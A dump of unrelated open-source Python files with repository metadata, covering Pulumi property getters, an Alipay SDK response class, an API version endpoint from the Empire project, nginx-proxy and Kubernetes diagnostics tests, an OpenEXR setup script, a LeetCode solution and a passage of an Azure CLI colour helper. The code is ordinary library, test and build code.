def failure_tolerance_percentage(self) -> Optional[pulumi.Input[int]]:
"""
The percentage of accounts, per Region, for which this stack operation can fail before AWS CloudFormation stops the operation in that Region.
"""
return pulumi.get(self, "failure_tolerance_percentage")
@failure_tolerance_percentage.setter
def failure_tolerance_percentage(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "failure_tolerance_percentage", value)
@property
@pulumi.getter(name="maxConcurrentCount")
def max_concurrent_count(self) -> Optional[pulumi.Input[int]]:
"""
The maximum number of accounts in which to perform this operation at one time.
"""
return pulumi.get(self, "max_concurrent_count")
@max_concurrent_count.setter
def max_concurrent_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_concurrent_count", value)
@property
@pulumi.getter(name="maxConcurrentPercentage")
def max_concurrent_percentage(self) -> Optional[pulumi.Input[int]]:
"""
The maximum percentage of accounts in which to perform this operation at one time.
"""
return pulumi.get(self, "max_concurrent_percentage")
@max_concurrent_percentage.setter
def max_concurrent_percentage(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_concurrent_percentage", value)
@property
@pulumi.getter(name="regionConcurrencyType")
def region_concurrency_type(self) -> Optional[pulumi.Input[str]]:
"""
The concurrency type of deploying StackSets operations in Regions, could be in parallel or one Region at a time.
"""
return pulumi.get(self, "region_concurrency_type")
@region_concurrency_type.setter
def region_concurrency_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region_concurrency_type", value)
@property
@pulumi.getter(name="regionOrders")
def region_orders(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The order of the Regions in where you want to perform the stack operation.
"""
return pulumi.get(self, "region_orders")
@region_orders.setter
def region_orders(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "region_orders", value)
|
e2d8cb2569076bd76e7576c576e1904add6ac9de
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/response/AntMerchantOrderStoreQueryResponse.py
|
13434db198838592f5ef49211d26548a3ec1b457
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771
| 2023-08-23T07:12:26
| 2023-08-23T07:12:26
| 133,338,689
| 247
| 70
|
Apache-2.0
| 2023-04-25T04:54:02
| 2018-05-14T09:40:54
|
Python
|
UTF-8
|
Python
| false
| false
| 3,536
|
py
|
AntMerchantOrderStoreQueryResponse.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
from alipay.aop.api.domain.OrderExt import OrderExt
from alipay.aop.api.domain.StoreOrderGood import StoreOrderGood
class AntMerchantOrderStoreQueryResponse(AlipayResponse):
def __init__(self):
super(AntMerchantOrderStoreQueryResponse, self).__init__()
self._buyer_id = None
self._contact_phone = None
self._ext = None
self._goods_info_list = None
self._memo = None
self._order_id = None
self._out_biz_no = None
self._seller_id = None
self._user_name = None
@property
def buyer_id(self):
return self._buyer_id
@buyer_id.setter
def buyer_id(self, value):
self._buyer_id = value
@property
def contact_phone(self):
return self._contact_phone
@contact_phone.setter
def contact_phone(self, value):
self._contact_phone = value
@property
def ext(self):
return self._ext
@ext.setter
def ext(self, value):
if isinstance(value, list):
self._ext = list()
for i in value:
if isinstance(i, OrderExt):
self._ext.append(i)
else:
self._ext.append(OrderExt.from_alipay_dict(i))
@property
def goods_info_list(self):
return self._goods_info_list
@goods_info_list.setter
def goods_info_list(self, value):
if isinstance(value, list):
self._goods_info_list = list()
for i in value:
if isinstance(i, StoreOrderGood):
self._goods_info_list.append(i)
else:
self._goods_info_list.append(StoreOrderGood.from_alipay_dict(i))
@property
def memo(self):
return self._memo
@memo.setter
def memo(self, value):
self._memo = value
@property
def order_id(self):
return self._order_id
@order_id.setter
def order_id(self, value):
self._order_id = value
@property
def out_biz_no(self):
return self._out_biz_no
@out_biz_no.setter
def out_biz_no(self, value):
self._out_biz_no = value
@property
def seller_id(self):
return self._seller_id
@seller_id.setter
def seller_id(self, value):
self._seller_id = value
@property
def user_name(self):
return self._user_name
@user_name.setter
def user_name(self, value):
self._user_name = value
def parse_response_content(self, response_content):
response = super(AntMerchantOrderStoreQueryResponse, self).parse_response_content(response_content)
if 'buyer_id' in response:
self.buyer_id = response['buyer_id']
if 'contact_phone' in response:
self.contact_phone = response['contact_phone']
if 'ext' in response:
self.ext = response['ext']
if 'goods_info_list' in response:
self.goods_info_list = response['goods_info_list']
if 'memo' in response:
self.memo = response['memo']
if 'order_id' in response:
self.order_id = response['order_id']
if 'out_biz_no' in response:
self.out_biz_no = response['out_biz_no']
if 'seller_id' in response:
self.seller_id = response['seller_id']
if 'user_name' in response:
self.user_name = response['user_name']
|
fa4e9e3b0c04fe0af58c9e8fab2eb638af7d406c
|
1eca7ab68f713f9134549be8cff40d953d784326
|
/empire/server/api/v2/meta/meta_api.py
|
d28c66e6705549a29aab6462565d9826e3692a00
|
[
"BSD-3-Clause"
] |
permissive
|
BC-SECURITY/Empire
|
65576ac931635cded054912a02ed5d02a1b41f8d
|
5b2ad2c2e9b9f996e40c484215dfea36fefc808d
|
refs/heads/main
| 2023-09-04T05:00:52.366894
| 2023-08-27T22:08:54
| 2023-08-27T22:08:54
| 199,975,883
| 3,651
| 601
|
BSD-3-Clause
| 2023-09-08T05:50:26
| 2019-08-01T04:22:31
|
PowerShell
|
UTF-8
|
Python
| false
| false
| 858
|
py
|
meta_api.py
|
from fastapi import Depends
import empire.server.common.empire
from empire.server.api.api_router import APIRouter
from empire.server.api.jwt_auth import get_current_active_user
from empire.server.api.v2.meta.meta_dto import EmpireVersion
from empire.server.api.v2.shared_dto import BadRequestResponse, NotFoundResponse
from empire.server.server import main
listener_service = main.listenersv2
router = APIRouter(
prefix="/api/v2/meta",
tags=["meta"],
responses={
404: {"description": "Not found", "model": NotFoundResponse},
400: {"description": "Bad request", "model": BadRequestResponse},
},
dependencies=[Depends(get_current_active_user)],
)
@router.get(
"/version",
response_model=EmpireVersion,
)
async def read_empire_version():
return {"version": empire.server.common.empire.VERSION.split(" ")[0]}
|
5a05569980df2c8814c6275a15fd3979fe6846a6
|
a23a33d919d7465bbca5ce6bdac87a07e672e2b4
|
/test/test_events.py
|
b5da3dd4a32c027f6a218760c04d98857fc4b381
|
[
"MIT"
] |
permissive
|
nginx-proxy/nginx-proxy
|
66ff7a686acedd90545f5cf0a516aa6e812a6225
|
67ab97ed64875e9b671039903ce4c3a94d848b33
|
refs/heads/main
| 2023-09-06T06:20:24.081133
| 2023-09-04T07:05:03
| 2023-09-04T07:05:03
| 19,463,625
| 5,372
| 1,050
|
MIT
| 2023-09-11T04:17:40
| 2014-05-05T17:01:40
|
Python
|
UTF-8
|
Python
| false
| false
| 2,377
|
py
|
test_events.py
|
"""
Test that nginx-proxy detects new containers
"""
from time import sleep
import pytest
from docker.errors import NotFound
@pytest.fixture()
def web1(docker_compose):
"""
pytest fixture creating a web container with `VIRTUAL_HOST=web1.nginx-proxy` listening on port 81.
"""
container = docker_compose.containers.run(
name="web1",
image="web",
detach=True,
environment={
"WEB_PORTS": "81",
"VIRTUAL_HOST": "web1.nginx-proxy"
},
ports={"81/tcp": None}
)
sleep(2) # give it some time to initialize and for docker-gen to detect it
yield container
try:
docker_compose.containers.get("web1").remove(force=True)
except NotFound:
pass
@pytest.fixture()
def web2(docker_compose):
"""
pytest fixture creating a web container with `VIRTUAL_HOST=nginx-proxy`, `VIRTUAL_PATH=/web2/` and `VIRTUAL_DEST=/` listening on port 82.
"""
container = docker_compose.containers.run(
name="web2",
image="web",
detach=True,
environment={
"WEB_PORTS": "82",
"VIRTUAL_HOST": "nginx-proxy",
"VIRTUAL_PATH": "/web2/",
"VIRTUAL_DEST": "/",
},
ports={"82/tcp": None}
)
sleep(2) # give it some time to initialize and for docker-gen to detect it
yield container
try:
docker_compose.containers.get("web2").remove(force=True)
except NotFound:
pass
def test_nginx_proxy_behavior_when_alone(docker_compose, nginxproxy):
r = nginxproxy.get("http://nginx-proxy/")
assert r.status_code == 503
def test_new_container_is_detected_vhost(web1, nginxproxy):
r = nginxproxy.get("http://web1.nginx-proxy/port")
assert r.status_code == 200
assert "answer from port 81\n" == r.text
web1.remove(force=True)
sleep(2)
r = nginxproxy.get("http://web1.nginx-proxy/port")
assert r.status_code == 503
def test_new_container_is_detected_vpath(web2, nginxproxy):
r = nginxproxy.get("http://nginx-proxy/web2/port")
assert r.status_code == 200
assert "answer from port 82\n" == r.text
r = nginxproxy.get("http://nginx-proxy/port")
assert r.status_code in [404, 503]
web2.remove(force=True)
sleep(2)
r = nginxproxy.get("http://nginx-proxy/web2/port")
assert r.status_code == 503
|
7587f14f5bbf6cdcead90a96431a8b9a28d08fd7
|
cd9d6c3de853e9e2f1a4d4730b58a574052d8e0c
|
/j1b/verilator/shell.py
|
a1065802b69bea6c34cdc08331f19dbc9b3d3985
|
[
"BSD-3-Clause"
] |
permissive
|
jamesbowman/swapforth
|
d4f315a59a9bdfd4ee63af0bc4131b821c2b8166
|
8dbff77d7b8ecd6574926a2e128aa76d3e5450fd
|
refs/heads/master
| 2022-11-18T07:38:25.265422
| 2021-10-11T14:05:24
| 2021-10-11T14:05:24
| 37,439,378
| 281
| 65
|
BSD-3-Clause
| 2022-10-19T19:40:50
| 2015-06-15T02:33:15
|
Forth
|
UTF-8
|
Python
| false
| false
| 1,231
|
py
|
shell.py
|
from __future__ import print_function
import sys
from datetime import datetime
import time
import array
import struct
import os
sys.path.append("build/lib/python/")
import vsimj1b
sys.path.append("../../shell")
import swapforth
class TetheredJ1b(swapforth.TetheredTarget):
cellsize = 4
def open_ser(self, port, speed):
self.ser = vsimj1b.vsimj1b()
def reset(self):
ser = self.ser
ser.reset()
for c in ' 1 tth !':
ser.write(c)
ser.write('\r')
while 1:
c = ser.read(1)
# print(repr(c))
if c == b'\x1e':
break
def boot(self, bootfile = None):
sys.stdout.write('Contacting... ')
self.reset()
print('established')
def interrupt(self):
self.reset()
def serialize(self):
l = self.command_response('0 here dump')
lines = l.strip().replace('\r', '').split('\n')
s = []
for l in lines:
l = l.split()
s += [int(b, 16) for b in l[1:17]]
s = array.array('B', s).tobytes().ljust(32768, bytearray((0xff,)))
return array.array('i', s)
if __name__ == '__main__':
swapforth.main(TetheredJ1b)
|
4025c43023cc785922efe9de3336f7c52c4ef99f
|
0882ed3c9e1078a8f69a1fc720d2c05c9289dd23
|
/src/wrappers/python/setup.py
|
e92ba454ba89e99b8629e24ad2249eb7a2e78e7e
|
[
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
AcademySoftwareFoundation/openexr
|
846500ee441cc7b60d717ca4377050c55949ecde
|
1ee0ffec3a499ac8bae1ad7e5eff60571d1d83de
|
refs/heads/main
| 2023-09-01T11:33:55.842765
| 2023-08-31T20:30:32
| 2023-08-31T20:30:32
| 3,533,348
| 782
| 281
|
BSD-3-Clause
| 2023-09-14T20:59:10
| 2012-02-24T06:30:00
|
C
|
UTF-8
|
Python
| false
| false
| 2,938
|
py
|
setup.py
|
from setuptools import setup, Extension
import os
import platform
import re
DESC = """Python bindings for the OpenEXR image file format.
This is a script to autobuild the wheels using GitHub Actions. Please do not
use it manually.
If you detect any problem, please feel free to report the issue on the GitHub
page:
https://github.com/AcademySoftwareFoundation/openexr/issues
"""
version = []
with open('src/lib/OpenEXRCore/openexr_version.h', 'r') as f:
txt = f.read()
for name in ('MAJOR', 'MINOR', 'PATCH'):
version.append(re.search(
f'VERSION_{name} ([0-9]*)', txt).group(0).split(' ')[-1])
version_major, version_minor, version_patch = version
version = f"{version_major}.{version_minor}.{version_patch}"
libs=[]
libs_static=[f'OpenEXR-{version_major}_{version_minor}',
f'IlmThread-{version_major}_{version_minor}',
f'Iex-{version_major}_{version_minor}',
f'Imath-{version_major}_{version_minor}',
f'OpenEXRCore-{version_major}_{version_minor}'
]
definitions = [('PYOPENEXR_VERSION_MAJOR', f'{version_major}'),
('PYOPENEXR_VERSION_MINOR', f'{version_minor}'),
('PYOPENEXR_VERSION_PATCH', f'{version_patch}'),]
if platform.system() == "Windows":
definitions = [('PYOPENEXR_VERSION', f'\\"{version}\\"')]
extra_compile_args = []
if platform.system() == 'Darwin':
extra_compile_args += ['-std=c++11',
'-Wc++11-extensions',
'-Wc++11-long-long']
libs_dir = "./openexr.install/lib/"
if not os.path.isdir(libs_dir):
libs_dir = "./openexr.install/lib64/"
if platform.system() == "Windows":
extra_link_args = [libs_dir + lib + ".lib"
for lib in libs_static]
extra_link_args = extra_link_args + [
"ws2_32.lib", "dbghelp.lib", "psapi.lib", "kernel32.lib", "user32.lib",
"gdi32.lib", "winspool.lib", "shell32.lib", "ole32.lib",
"oleaut32.lib", "uuid.lib", "comdlg32.lib", "advapi32.lib"]
else:
extra_link_args = [libs_dir + "lib" + lib + ".a"
for lib in libs_static]
setup(name='OpenEXR',
author = 'Contributors to the OpenEXR Project',
author_email = 'info@openexr.com',
url = 'https://github.com/AcademySoftwareFoundation/openexr',
description = "Python bindings for the OpenEXR image file format",
long_description = DESC,
version=version,
ext_modules=[
Extension('OpenEXR',
['OpenEXR.cpp'],
language='c++',
define_macros=definitions,
include_dirs=['./openexr.install/include/OpenEXR',
'./openexr.install/include/Imath',],
libraries=libs,
extra_compile_args=extra_compile_args,
extra_link_args=extra_link_args,
)
],
py_modules=['Imath'],
)
|
254f15fae96dd4049a4633f4c6e2a1f761f1cf9c
|
10ddfb2d43a8ec5d47ce35dc0b8acf4fd58dea94
|
/Python/detect-pattern-of-length-m-repeated-k-or-more-times.py
|
8c3057cfba09f394f57058b4441912b1d8323a27
|
[
"MIT"
] |
permissive
|
kamyu104/LeetCode-Solutions
|
f54822059405ef4df737d2e9898b024f051fd525
|
4dc4e6642dc92f1983c13564cc0fd99917cab358
|
refs/heads/master
| 2023-09-02T13:48:26.830566
| 2023-08-28T10:11:12
| 2023-08-28T10:11:12
| 152,631,182
| 4,549
| 1,651
|
MIT
| 2023-05-31T06:10:33
| 2018-10-11T17:38:35
|
C++
|
UTF-8
|
Python
| false
| false
| 449
|
py
|
detect-pattern-of-length-m-repeated-k-or-more-times.py
|
# Time: O(n)
# Space: O(1)
class Solution(object):
def containsPattern(self, arr, m, k):
"""
:type arr: List[int]
:type m: int
:type k: int
:rtype: bool
"""
cnt = 0
for i in xrange(len(arr)-m):
if arr[i] != arr[i+m]:
cnt = 0
continue
cnt += 1
if cnt == (k-1)*m:
return True
return False
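# Illustrative trace (added for clarity; the solution targets Python 2, hence xrange): for
# arr = [1, 2, 1, 2, 1, 2], m = 2, k = 3 every comparison arr[i] == arr[i + m] holds, so cnt
# reaches (k - 1) * m == 4 at i == 3 and the method returns True; any mismatch resets cnt to 0.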
|
723d208d637b9c8386c1c84034c80bbdbdadb0f2
|
363789ea76e72b7ca571ca34e9b7f4e126d8fa15
|
/src/tests/diagnostics/diagnostics_test.py
|
ba7d0aed8d53ebac62d25c3598fb641bd56db5f0
|
[
"Apache-2.0"
] |
permissive
|
ElasticBox/elastickube
|
d6a4ffc7d524930c0078bd4688908a1e42840455
|
8ef9ebaaa62559bc896a1b7517688aaf1db3e464
|
refs/heads/master
| 2020-05-22T05:42:34.102362
| 2017-05-03T13:09:24
| 2017-05-03T13:09:24
| 53,607,662
| 193
| 51
| null | 2017-05-16T13:47:04
| 2016-03-10T18:32:07
|
CSS
|
UTF-8
|
Python
| false
| false
| 17,211
|
py
|
diagnostics_test.py
|
"""
Copyright 2016 ElasticBox All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import, unicode_literals
import copy
import json
import os
from concurrent.futures import Future
import mock
import pytest
try:
from diagnostics import diagnostics
except ImportError:
pass
SAMPLE_TOKEN = (
'eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2a'
'WNlYWNjb3VudC9uYW1lc3BhY2UiOiJrdWJlLXN5c3RlbSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VjcmV0Lm5hbWUiOiJkZWZ'
'hdWx0LXRva2VuLTZ5ZHB1Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQubmFtZSI6ImRlZmF1bHQiLCJrd'
'WJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC51aWQiOiIyZDZhOGFkZC1mNzQ3LTExZTUtYjQyZC0wODAwMjdmZjN'
'hNmUiLCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6a3ViZS1zeXN0ZW06ZGVmYXVsdCJ9.PQVUwcrHlZbI_I6-LQgqukMrY1-8-ZkEZLpq'
'VqhN7tZVTKTcxTyuG4BP8vnCa_BOzX6atvmx5XRw7bgcs4K34Tk-r1S8G4HsD6_z0U95wz-nS6sTm0vOXkcZGoGiLRAmwV4-8oLEzTlQWN35zs'
'pX3YeUsuUEg3WSOLRUI7vDV911dJgAISP8DJ9t9ZwtCrtT9afzb4Kxqk-E-7QqOkqIxPGDwQQodLTiW8LzMDHd-wO5x0C_LFa2lXg8KgwY_xeb'
'1wApMxgU-rl3RrIRac48CYQnGG-PgDwPdPltRDoex-j2mKuMm682fkmtERjYCtq2mmnHsG5Zhqz4TLXKHc4qkQ')
SAMPLE_REPLICATION_CONTROLLER = {
"kind": "ReplicationController",
"apiVersion": "v1",
"metadata": {
"name": "elastickube-server",
"namespace": "kube-system",
"selfLink": "/api/v1/namespaces/kube-system/replicationcontrollers/elastickube-server",
"uid": "8a7ac7cd-fa5a-11e5-9085-080027ff3a6e",
"resourceVersion": "8319",
"generation": 1,
"creationTimestamp": "2016-04-04T11:44:08Z",
"labels": {
"name": "elastickube-server"
}
},
"spec": {
"replicas": 1,
"selector": {
"name": "elastickube-server"
},
"template": {
"metadata": {
"creationTimestamp": None,
"labels": {
"name": "elastickube-server"
}
},
"spec": {
"volumes": [
{
"name": "elastickube-code",
"hostPath": {
"path": "/opt/elastickube/src"
}
},
{
"name": "elastickube-charts",
"hostPath": {
"path": "/var/elastickube/charts"
}
},
{
"name": "elastickube-run",
"hostPath": {
"path": "/var/run/elastickube"
}
},
{
"name": "elasticbox-home-user",
"hostPath": {
"path": "/home/elasticbox"
}
}
],
"containers": [
{
"name": "elastickube-api",
"image": "elasticbox/elastickube-api:latest",
"resources": {
"limits": {
"cpu": "100m",
"memory": "128Mi"
}
},
"volumeMounts": [
{
"name": "elastickube-code",
"mountPath": "/opt/elastickube"
},
{
"name": "elastickube-run",
"mountPath": "/var/run"
},
{
"name": "elasticbox-home-user",
"mountPath": "/home/elasticbox"
}
],
"terminationMessagePath": "/dev/termination-log",
"imagePullPolicy": "Never"
},
{
"name": "elastickube-charts",
"image": "elasticbox/elastickube-charts:latest",
"resources": {
"limits": {
"cpu": "50m",
"memory": "64Mi"
}
},
"volumeMounts": [
{
"name": "elastickube-code",
"mountPath": "/opt/elastickube"
},
{
"name": "elastickube-charts",
"mountPath": "/var/elastickube/charts"
}
],
"terminationMessagePath": "/dev/termination-log",
"imagePullPolicy": "Never"
},
{
"name": "elastickube-nginx",
"image": "elasticbox/elastickube-nginx:latest",
"ports": [
{
"name": "http",
"hostPort": 80,
"containerPort": 80,
"protocol": "TCP"
}
],
"resources": {
"limits": {
"cpu": "10m",
"memory": "32Mi"
}
},
"volumeMounts": [
{
"name": "elastickube-code",
"mountPath": "/opt/elastickube"
},
{
"name": "elastickube-run",
"mountPath": "/var/run"
}
],
"terminationMessagePath": "/dev/termination-log",
"imagePullPolicy": "Never"
}
],
"restartPolicy": "Always",
"terminationGracePeriodSeconds": 30,
"dnsPolicy": "ClusterFirst",
"securityContext": {}
}
}
},
"status": {
"replicas": 1,
"fullyLabeledReplicas": 1,
"observedGeneration": 1
}
}
@pytest.fixture
def token_path(tmpdir):
token_file = tmpdir.join('token_content')
token_file.write(SAMPLE_TOKEN)
return str(token_file)
@pytest.fixture
def env(token_path):
return {'KUBERNETES_SERVICE_PORT': '8080',
'KUBERNETES_SERVICE_HOST': '10.107.56.115',
'KUBE_API_TOKEN_PATH': token_path,
'DNS_TEST_HOSTNAME': 'google.com', # Use a public DNS not kubernetes.default for testing outside kubernetes
'HEAPSTER_SERVICE_HOST': '10.0.127.162',
'HEAPSTER_SERVICE_PORT': '80',
}
@pytest.fixture
def settings():
return {'kubernetes_url': 'http://10.107.56.115:8080', 'token': SAMPLE_TOKEN,
'check_connectivity_url': 'http://google.com', 'dns_test_hostname': 'google.com',
'HEAPSTER_SERVICE_HOST': '10.0.127.162', 'HEAPSTER_SERVICE_PORT': '80',
'KUBERNETES_SERVICE_HOST': '10.107.56.115', 'KUBERNETES_SERVICE_PORT': '8080',
}
@pytest.fixture
def replica_names():
return [
('kube-system', 'elastickube-server'),
('kube-system', 'elastickube-mongo'),
]
@pytest.fixture
def status(replica_names):
return diagnostics.SystemStatus(replica_names)
@pytest.fixture
def status_ok(status):
status.internet = diagnostics.status_ok()
status.kubernetes = diagnostics.status_ok()
status.dns = diagnostics.status_ok()
status.heapster = diagnostics.status_ok()
for name in status.rcs:
status.rcs[name] = diagnostics.status_ok()
return status
@pytest.fixture
def app(status):
statics_path = os.path.join(os.path.dirname(__file__), 'assets')
return diagnostics.create_application(status, statics_path, debug=False)
@pytest.fixture
def rc_document():
return copy.deepcopy(SAMPLE_REPLICATION_CONTROLLER)
def test_settings_from_env_http(env):
settings = {}
env['KUBERNETES_SERVICE_PORT'] = '80'
diagnostics.settings_from_env(settings, env)
assert settings['kubernetes_url'] == 'http://10.107.56.115:80'
def test_settings_from_env_custom_port(env):
settings = {}
env['KUBERNETES_SERVICE_PORT'] = '8080'
diagnostics.settings_from_env(settings, env)
assert settings['kubernetes_url'] == 'http://10.107.56.115:8080'
def test_settings_from_env_https(env):
settings = {}
env['KUBERNETES_SERVICE_PORT'] = '443'
diagnostics.settings_from_env(settings, env)
assert settings['kubernetes_url'] == 'https://10.107.56.115:443'
def test_settings_from_env_missing_kube_api_key(env):
settings = {}
del env['KUBE_API_TOKEN_PATH']
diagnostics.settings_from_env(settings, env)
assert settings['token'] is None
def test_default_settings_connectivity_url(env):
settings = {}
env['CHECK_CONNECTIVITY_URL'] = 'TEST_URL.COM'
diagnostics.settings_from_env(settings, env)
assert settings['check_connectivity_url'] == 'TEST_URL.COM'
def test_default_settings_dns(env):
settings = {}
env['DNS_TEST_HOSTNAME'] = 'TEST_URL.COM'
diagnostics.settings_from_env(settings, env)
assert settings['dns_test_hostname'] == 'TEST_URL.COM'
def test_default_settings_from_default_env(env, settings):
base_settings = {}
diagnostics.settings_from_env(base_settings, env)
assert base_settings == settings
# System status tests
def test_system_status_initial(status):
serialized_status = json.dumps(status.to_view())
assert 'internet' in serialized_status
assert 'kubernetes' in serialized_status
assert 'dns' in serialized_status
for rc in status.rcs:
assert rc in serialized_status
def test_system_status_custom_replica_name():
replica_names = (
('namespace', 'name'),
)
s = diagnostics.SystemStatus(replica_names)
serialized_status = s.to_view()
assert 'namespace.name' in serialized_status
assert 'internet' in serialized_status
assert 'kubernetes' in serialized_status
@pytest.mark.integration
@pytest.mark.gen_test
def test_check_kubernetes_status(settings):
status = yield diagnostics._check_kubernetes_status(settings)
assert status['reason'] == ''
assert status['status'] is True
@pytest.mark.gen_test
def test_check_kubernetes_status_wrong_answer(settings):
with mock.patch('diagnostics.diagnostics._get_json') as get_json:
get_json.side_effect = IOError('Cannot connect')
status = yield diagnostics._check_kubernetes_status(settings)
assert status['reason'] == 'Cannot connect'
assert status['status'] is False
@pytest.mark.gen_test
def test_check_kubernetes_status_wrong_request(settings):
with mock.patch('diagnostics.diagnostics._get_json') as get_json:
get_json.return_value = {}
status = yield diagnostics._check_kubernetes_status(settings)
assert 'Missing' in status['reason']
assert status['status'] is False
def test_document_rc_status_ok(rc_document):
status = diagnostics._document_rc_status(rc_document)
assert status['reason'] == ''
assert status['status'] is True
def test_document_rc_status_missing_replicas(rc_document):
rc_document['status']['replicas'] = 0
status = diagnostics._document_rc_status(rc_document)
assert status['reason'] == 'Current pods 0, desired 1'
assert status['status'] is False
def test_document_rc_status_too_many_replicas(rc_document):
rc_document['status']['replicas'] = 2
status = diagnostics._document_rc_status(rc_document)
assert status['reason'] == 'Current pods 2, desired 1'
assert status['status'] is False
def test_document_rc_status_wrong_replicaset(rc_document):
rc_document['spec']['replicas'] = 2
status = diagnostics._document_rc_status(rc_document)
assert status['reason'] == 'Current pods 1, desired 2'
assert status['status'] is False
def test_document_rc_status_wrong_no_replicas(rc_document):
del rc_document['spec']['replicas']
status = diagnostics._document_rc_status(rc_document)
assert 'Wrong replication controller document' in status['reason']
assert status['status'] is False
@pytest.mark.integration
@pytest.mark.gen_test
def test_check_rcs_ok(settings, replica_names):
for namespace, name in replica_names:
status = yield diagnostics._check_replicaset(settings, namespace, name)
assert status['reason'] == ''
assert status['status'] is True
@pytest.mark.integration
@pytest.mark.gen_test
def test_check_internet(settings):
status = yield diagnostics._check_internet(settings)
assert status['reason'] == ''
assert status['status'] is True
@pytest.mark.integration
@pytest.mark.gen_test
def test_check_dns(settings):
status = yield diagnostics._check_dns(settings)
assert status['reason'] == ''
assert status['status'] is True
@pytest.mark.gen_test
def test_check_internet_ioerror(settings):
settings['check_connectivity_url'] = 'test_url'
with mock.patch('diagnostics.diagnostics.tornado.httpclient.AsyncHTTPClient') as client:
fut = Future()
fut.set_exception(IOError('ERROR TEST'))
client.return_value.fetch.return_value = fut
status = yield diagnostics._check_internet(settings)
assert 'ERROR TEST' in status['reason']
assert 'test_url' in status['reason']
assert status['status'] is False
@pytest.mark.gen_test
def test_check_internet_wrong_status_code(settings):
settings['check_connectivity_url'] = 'test_url'
with mock.patch('diagnostics.diagnostics.tornado.httpclient.AsyncHTTPClient') as client:
result = mock.MagicMock()
result.code = 555
fut = Future()
fut.set_result(result)
client.return_value.fetch.return_value = fut
status = yield diagnostics._check_internet(settings)
assert '555' in status['reason']
assert status['status'] is False
@pytest.mark.integration
@pytest.mark.gen_test
def test_check_replicaset_ok(settings):
status = yield diagnostics._check_replicaset(settings, 'kube-system', 'elastickube-server')
assert status['reason'] == ''
assert status['status'] is True
@pytest.mark.gen_test(run_sync=False)
def test_application_html_initializing(http_client, base_url):
response = yield http_client.fetch(base_url)
# assert app is None
assert response.code == 200
assert 'Diagnostics' in response.body
assert 'Initializing' in response.body
@pytest.mark.gen_test(run_sync=False)
def test_application_json_initializing(http_client, base_url, status):
response = yield http_client.fetch(base_url + '/json')
assert response.code == 200
data = json.loads(response.body)
for _, status in data.items():
assert status['status'] is None # Initializing
@pytest.mark.gen_test(run_sync=False)
def test_application_json_internet_ok(http_client, base_url, status):
status.internet = diagnostics.status_ok()
response = yield http_client.fetch(base_url + '/json')
assert response.code == 200
data = json.loads(response.body)
assert data['internet']['status'] is True
@pytest.mark.gen_test(run_sync=False)
def test_application_json_rcs_ok(http_client, base_url, status_ok):
response = yield http_client.fetch(base_url + '/json')
assert response.code == 200
data = json.loads(response.body)
for name in data:
assert data[name]['reason'] == ''
assert data[name]['status'] is True
@pytest.mark.gen_test(run_sync=False)
def test_application_json_kubernetes_no_ok(http_client, base_url, status):
status.kubernetes = diagnostics.status_error('Failed to connect')
response = yield http_client.fetch(base_url + '/json')
assert response.code == 200
data = json.loads(response.body)
assert data['kubernetes']['status'] is False
assert data['kubernetes']['reason'] == 'Failed to connect'
for name in status.rcs:
assert data[name]['status'] is None
|
260a60669f3d12e8a8a7a789e603b2707d9c0631
|
a4ea525e226d6c401fdb87a6e9adfdc5d07e6020
|
/src/azure-cli/azure/cli/command_modules/resource/_color.py
|
c660ed86c65196d28773fa3c79769eb67f144b81
|
[
"MIT",
"BSD-3-Clause",
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"MPL-2.0",
"LGPL-2.1-only",
"Apache-2.0",
"LGPL-2.1-or-later",
"BSD-2-Clause"
] |
permissive
|
Azure/azure-cli
|
13340eeca2e288e66e84d393fa1c8a93d46c8686
|
a40fd14ad0b6e89720a2e58d4d9be3a6ce1535ca
|
refs/heads/dev
| 2023-08-17T06:25:37.431463
| 2023-08-17T06:00:10
| 2023-08-17T06:00:10
| 51,040,886
| 4,018
| 3,310
|
MIT
| 2023-09-14T11:11:05
| 2016-02-04T00:21:51
|
Python
|
UTF-8
|
Python
| false
| false
| 2,041
|
py
|
_color.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from enum import Enum
from collections import deque
class Color(Enum):
ORANGE = "\033[38;5;208m"
GREEN = "\033[38;5;77m"
PURPLE = "\033[38;5;141m"
BLUE = "\033[38;5;39m"
GRAY = "\033[38;5;246m"
RESET = "\033[0m"
def __str__(self):
return self.value
class ColoredStringBuilder:
def __init__(self, enable_color=True):
self._enable_color = enable_color
self._contents = []
self._colors = deque()
def build(self):
return "".join(self._contents)
def append(self, value, color=None):
if color:
self._push_color(color)
self._contents.append(str(value))
if color:
self._pop_color()
return self
def append_line(self, value="", color=None):
self.append(f"{str(value)}\n", color)
return self
